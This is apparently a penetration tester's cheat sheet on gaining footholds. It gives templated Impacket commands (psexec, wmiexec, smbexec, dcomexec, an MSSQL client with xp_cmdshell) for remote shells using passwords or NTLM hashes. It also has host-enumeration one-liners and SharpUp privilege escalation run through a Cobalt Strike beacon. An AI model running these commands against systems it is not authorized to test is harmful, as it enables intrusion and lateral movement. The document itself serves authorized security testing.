
The Cloud Source for Client Engagement Resources
Footholds
Using Impacket Remote Tools:
​
Syntax: {variable-placeholder}
without -c {cmd} returns a cmd shell
​
Impacket Examples Folder:
-
msclient.py - Provides SQL shell on Tgt
-
psexec.py - Executes a file on a remote host
-
smbexec.py - Executes a file on a remote host using SMB
-
wmiexec.py - Executes a file on a remote host WMI
-
dcomexec.py - Provides a limited shell via DCOM
​​
msclient.py - example:
-
python msclient.py {sql-usr}:{Pswd}@{SqlSvr-ip}
-
From prompt>
-
SELECT name FROM master.dbo.sysdatabases WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb');
-
SELECT TOP(5) * FROM {tbl-name};
-
exec exec master.dbo.xp_cmdshell {cmd-2-exec}
-
-
psexec.py - example:
-
python psexec.py {domain}/{user}:{Pswd}@{tgt-ip}
-
python psexec.py {domain}/{user}:{Pswd}@{tgt-ip} -c {path/2/File.ext}
-
python psexec.py -d [domain] -hashes {0:NTLM-hash} -ip {tgt-ip} -command {cmd.exe -c }
​​
wmiexec.py - example:
-
python wmiexec.py {domain}/{user}:{Pswd}@{tgt-ip}
-
python wmiexec.py {domain}/{user}:{Pswd}@{tgt-ip} -c {path/2/File.ext}
​​
dcomexec.py - example:
-
python dcomexec.py {domain}/{user}:{Pswd}@{tgt-ip}
​
​
Documenting Hosts from Cmd Shells
​
Windows Hosts:
-
hostname & ver & ipconfig | findstr /i "ipv4"
​
Nix Hosts:
-
uname -a & ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'
​
Privilege Escalation Techniques
​
SharpUp.Exe (https://github.com/GhostPack/SharpUp):
-
Via Cobalt Strike Beacon: execute-assembly SharpUp.exe
​
Placeholder - more to come!:
​
Pentest-Zen (ExitC0de00c.com)
